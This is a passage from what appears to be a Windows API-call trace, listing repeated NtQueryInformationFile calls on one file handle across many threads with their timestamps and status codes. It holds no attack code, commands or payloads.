IoStatusBlock=0x35ff8e8, FileInformation=0x210e20) returned 0x0 Thread: id = 1612 os_tid = 0x130 [0165.068] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373ff70, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373ff70, FileInformation=0x210e20) returned 0x0 Thread: id = 1613 os_tid = 0x754 [0165.070] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361f900, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361f900, FileInformation=0x210e20) returned 0x0 Thread: id = 1614 os_tid = 0x72c [0165.072] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fc40, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fc40, FileInformation=0x210e20) returned 0x0 Thread: id = 1615 os_tid = 0x748 [0165.074] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fa38, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fa38, FileInformation=0x210e20) returned 0x0 Thread: id = 1616 os_tid = 0x928 [0165.076] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fe00, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361fe00, FileInformation=0x210e20) returned 0x0 Thread: id = 1617 os_tid = 0xcc [0165.078] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367f7f8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367f7f8, FileInformation=0x210e20) returned 0x0 Thread: id = 1618 os_tid = 0xd0 [0165.087] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfaf8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfaf8, FileInformation=0x210e20) returned 0x0 Thread: id = 1619 os_tid = 0xd4 [0165.098] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bfca0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bfca0, FileInformation=0x210e20) returned 0x0 Thread: id = 1620 os_tid = 0xd8 [0165.101] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fe58, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fe58, FileInformation=0x210e20) returned 0x0 Thread: id = 1621 os_tid = 0xdc [0165.106] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363fe78, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363fe78, FileInformation=0x210e20) returned 0x0 Thread: id = 1622 os_tid = 0xe0 [0165.108] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fcb0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fcb0, FileInformation=0x210e20) returned 0x0 Thread: id = 1623 os_tid = 0xe4 [0165.110] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfbe0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfbe0, FileInformation=0x210e20) returned 0x0 Thread: id = 1624 os_tid = 0xe8 [0165.112] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363fcf8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363fcf8, FileInformation=0x210e20) returned 0x0 Thread: id = 1625 os_tid = 0xec [0165.114] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361f9d0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361f9d0, FileInformation=0x210e20) returned 0x0 Thread: id = 1626 os_tid = 0x9d8 [0165.115] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bfe78, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bfe78, FileInformation=0x210e20) returned 0x0 Thread: id = 1627 os_tid = 0x898 [0165.117] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fd08, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fd08, FileInformation=0x210e20) returned 0x0 Thread: id = 1628 os_tid = 0x48c [0165.119] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fea8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fea8, FileInformation=0x210e20) returned 0x0 Thread: id = 1629 os_tid = 0x6a4 [0165.121] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367fd08, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367fd08, FileInformation=0x210e20) returned 0x0 Thread: id = 1630 os_tid = 0x20c [0165.123] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bf7e8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bf7e8, FileInformation=0x210e20) returned 0x0 Thread: id = 1631 os_tid = 0x630 [0165.125] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fec8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fec8, FileInformation=0x210e20) returned 0x0 Thread: id = 1632 os_tid = 0x5e4 [0165.127] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357ff68, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357ff68, FileInformation=0x210e20) returned 0x0 Thread: id = 1633 os_tid = 0xb28 [0165.129] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fbc8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fbc8, FileInformation=0x210e20) returned 0x0 Thread: id = 1634 os_tid = 0xb20 [0165.131] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fba0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fba0, FileInformation=0x210e20) returned 0x0 Thread: id = 1635 os_tid = 0x704 [0165.134] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373f800, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373f800, FileInformation=0x210e20) returned 0x0 Thread: id = 1636 os_tid = 0x568 [0165.136] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36df7e8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36df7e8, FileInformation=0x210e20) returned 0x0 Thread: id = 1637 os_tid = 0x5ac [0165.137] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfe78, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfe78, FileInformation=0x210e20) returned 0x0 Thread: id = 1638 os_tid = 0x908 [0165.139] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfd90, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfd90, FileInformation=0x210e20) returned 0x0 Thread: id = 1639 os_tid = 0x888 [0165.141] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bf988, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bf988, FileInformation=0x210e20) returned 0x0 Thread: id = 1640 os_tid = 0x544 [0165.143] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fc58, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361fc58, FileInformation=0x210e20) returned 0x0 Thread: id = 1641 os_tid = 0x76c [0165.145] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fc10, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fc10, FileInformation=0x210e20) returned 0x0 Thread: id = 1642 os_tid = 0xa9c [0165.147] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffe08, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffe08, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 1643 os_tid = 0x114 [0165.149] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfcf8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfcf8, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 1644 os_tid = 0x5b8 [0165.151] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fc98, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fc98, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 1645 os_tid = 0x814 [0165.153] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35df7c8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35df7c8, FileInformation=0x210e20) returned 0x0 Thread: id = 1646 os_tid = 0x834 [0165.155] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363fb10, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363fb10, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 1647 os_tid = 0x884 [0165.157] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36df8e0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36df8e0, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 1648 os_tid = 0x5d4 [0165.159] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fd40, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fd40, FileInformation=0x210e20) returned 0x0 Thread: id = 1649 os_tid = 0x340 [0165.161] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffb38, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffb38, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 1650 os_tid = 0x810 [0165.163] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fa00, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fa00, FileInformation=0x210e20) returned 0x0 Thread: id = 1651 os_tid = 0x830 [0165.165] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fba0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fba0, FileInformation=0x210e20) returned 0x0 Thread: id = 1652 os_tid = 0x880 [0165.167] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365f998, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365f998, FileInformation=0x210e20) returned 0x0 Thread: id = 1653 os_tid = 0xae4 [0165.169] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371f788, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371f788, FileInformation=0x210e20) returned 0x0 Thread: id = 1654 os_tid = 0x570 [0165.171] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fbe8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fbe8, FileInformation=0x210e20) returned 0x0 Thread: id = 1655 os_tid = 0xb40 [0165.173] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bf8a8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bf8a8, FileInformation=0x210e20) returned 0x0 Thread: id = 1656 os_tid = 0x5f4 [0165.175] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fe50, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fe50, FileInformation=0x210e20) returned 0x0 Thread: id = 1657 os_tid = 0xbb8 [0165.177] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367fb88, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367fb88, FileInformation=0x210e20) returned 0x0 Thread: id = 1658 os_tid = 0x598 [0165.179] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fc90, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361fc90, FileInformation=0x210e20) returned 0x0 Thread: id = 1659 os_tid = 0x4e4 [0165.181] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371f9c8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371f9c8, FileInformation=0x210e20) returned 0x0 Thread: id = 1660 os_tid = 0xbfc [0165.190] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36df990, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36df990, FileInformation=0x210e20) returned 0x0 Thread: id = 1661 os_tid = 0x80c [0165.192] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fd28, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fd28, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 1662 os_tid = 0xbf8 [0165.194] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fd90, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fd90, FileInformation=0x210e20) returned 0x0 Thread: id = 1663 os_tid = 0x524 [0165.197] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ffbc0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ffbc0, FileInformation=0x210e20) returned 0x0 Thread: id = 1664 os_tid = 0x674 [0165.201] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bf950, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bf950, FileInformation=0x210e20) returned 0x0 Thread: id = 1665 os_tid = 0x4a0 [0165.203] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fc30, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fc30, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 1666 os_tid = 0x5d8 [0165.205] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363fcf0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363fcf0, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 1667 os_tid = 0x69c [0165.207] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361f8d0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361f8d0, FileInformation=0x210e20) returned 0x0 Thread: id = 1668 os_tid = 0x6a8 [0165.209] NtQueryInformationFile (FileHandle=0x194, IoStatusBlock=0x373f940, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9) Thread: id = 1669 os_tid = 0xb68 [0165.465] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfab0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfab0, FileInformation=0x210e20) returned 0x0 Thread: id = 1670 os_tid = 0x758 [0165.467] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fba0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fba0, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 1671 os_tid = 0x3d4 [0165.468] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfea0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfea0, FileInformation=0x210e20) returned 0x0 Thread: id = 1672 os_tid = 0x484 [0165.470] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfc10, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfc10, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 1673 os_tid = 0xb4c [0165.472] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371ff08, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371ff08, FileInformation=0x210e20) returned 0x0 Thread: id = 1674 os_tid = 0xa1c [0165.474] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bf848, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bf848, FileInformation=0x210e20) returned 0x0 Thread: id = 1675 os_tid = 0x2ac [0165.476] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ff8e8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ff8e8, FileInformation=0x210e20) returned 0x0 Thread: id = 1676 os_tid = 0xa8c [0165.478] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35df990, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35df990, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 1677 os_tid = 0x68c [0165.480] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373f9d0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373f9d0, FileInformation=0x210e20) returned 0x0 Thread: id = 1678 os_tid = 0x388 [0165.482] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfd60, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfd60, FileInformation=0x210e20) returned 0x0 Thread: id = 1679 os_tid = 0xa50 [0165.485] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fcb0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fcb0, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 1680 os_tid = 0x75c [0165.487] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfeb0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfeb0, FileInformation=0x210e20) returned 0x0 Thread: id = 1681 os_tid = 0x240 [0165.489] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fbc8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fbc8, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 1682 os_tid = 0x320 [0165.512] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fa48, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fa48, FileInformation=0x210e20) returned 0x0 Thread: id = 1683 os_tid = 0x3b4 [0165.514] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfdc0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfdc0, FileInformation=0x210e20) returned 0xc000000d Thread: id = 1684 os_tid = 0x760 [0165.516] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363fba8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363fba8, FileInformation=0x210e20) returned 0xc000000d Thread: id = 1685 os_tid = 0xb00 [0165.517] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365ff70, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365ff70, FileInformation=0x210e20) returned 0xc000000d Thread: id = 1686 os_tid = 0x7fc [0165.519] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bfb28, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bfb28, FileInformation=0x210e20) returned 0xc000000d Thread: id = 1687 os_tid = 0xb18 [0165.521] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fa88, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fa88, FileInformation=0x210e20) returned 0xc000000d Thread: id = 1688 os_tid = 0xa68 [0165.523] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fb38, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fb38, FileInformation=0x210e20) returned 0xc000000d Thread: id = 1689 os_tid = 0x224 [0165.525] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367fbf0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367fbf0, FileInformation=0x210e20) returned 0xc000000d Thread: id = 1690 os_tid = 0x2c4 [0165.527] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fdf8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fdf8, FileInformation=0x210e20) returned 0xc000000d Thread: id = 1691 os_tid = 0x24c [0165.529] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fad8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fad8, FileInformation=0x210e20) returned 0x0 Thread: id = 1692 os_tid = 0x4e8 [0165.530] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfd20, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfd20, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 1693 os_tid = 0x220 [0165.532] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367f9e8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367f9e8, FileInformation=0x210e20) returned 0x0 Thread: id = 1694 os_tid = 0xb04 [0165.534] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfa00, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfa00, FileInformation=0x210e20) returned 0x0 Thread: id = 1695 os_tid = 0x180 [0165.536] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bf8e0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bf8e0, FileInformation=0x210e20) returned 0x0 Thread: id = 1696 os_tid = 0x53c [0165.538] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffbe8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffbe8, FileInformation=0x210e20) returned 0x0 Thread: id = 1697 os_tid = 0x5b4 [0165.540] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fbf0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fbf0, FileInformation=0x210e20) returned 0x0 Thread: id = 1698 os_tid = 0x614 [0165.542] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bf7f8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bf7f8, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 1699 os_tid = 0x690 [0165.545] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fd28, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fd28, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1700 os_tid = 0x440 [0165.547] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfca8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfca8, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1701 os_tid = 0x7d8 [0165.549] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357f940, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357f940, FileInformation=0x210e20) returned 0x0 Thread: id = 1702 os_tid = 0xa60 [0165.551] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffd60, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffd60, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1703 os_tid = 0xb24 [0165.552] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35df920, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35df920, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1704 os_tid = 0x878 [0165.556] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361f8b0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361f8b0, FileInformation=0x210e20) returned 0x0 Thread: id = 1705 os_tid = 0xb1c [0165.558] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361f878, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361f878, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 1706 os_tid = 0xb08 [0165.560] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35df7d0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35df7d0, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 1707 os_tid = 0x4fc [0165.562] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffe00, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffe00, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 1708 os_tid = 0x4dc [0165.563] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359f8f8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359f8f8, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 1709 os_tid = 0x43c [0165.565] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bf8f0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bf8f0, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 1710 os_tid = 0x1c4 [0165.567] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fac8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fac8, FileInformation=0x210e20) returned 0x0 Thread: id = 1711 os_tid = 0xbec [0165.569] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fb08, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fb08, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 1712 os_tid = 0xb48 [0165.570] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365f7e8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365f7e8, FileInformation=0x210e20) returned 0x0 Thread: id = 1713 os_tid = 0x5bc [0165.573] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361f7c8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361f7c8, FileInformation=0x210e20) returned 0x0 Thread: id = 1714 os_tid = 0x6b8 [0165.575] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfc70, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfc70, FileInformation=0x210e20) returned 0x0 Thread: id = 1715 os_tid = 0x2dc [0165.577] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363f878, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363f878, FileInformation=0x210e20) returned 0x0 Thread: id = 1716 os_tid = 0x158 [0165.578] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359f9f0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359f9f0, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 1717 os_tid = 0x6cc [0165.580] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fc78, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fc78, FileInformation=0x210e20) returned 0x0 Thread: id = 1718 os_tid = 0x694 [0165.582] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36df980, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36df980, FileInformation=0x210e20) returned 0x0 Thread: id = 1719 os_tid = 0x6d8 [0165.584] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fdd8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fdd8, FileInformation=0x210e20) returned 0x0 Thread: id = 1720 os_tid = 0x87c [0165.586] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fb10, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361fb10, FileInformation=0x210e20) returned 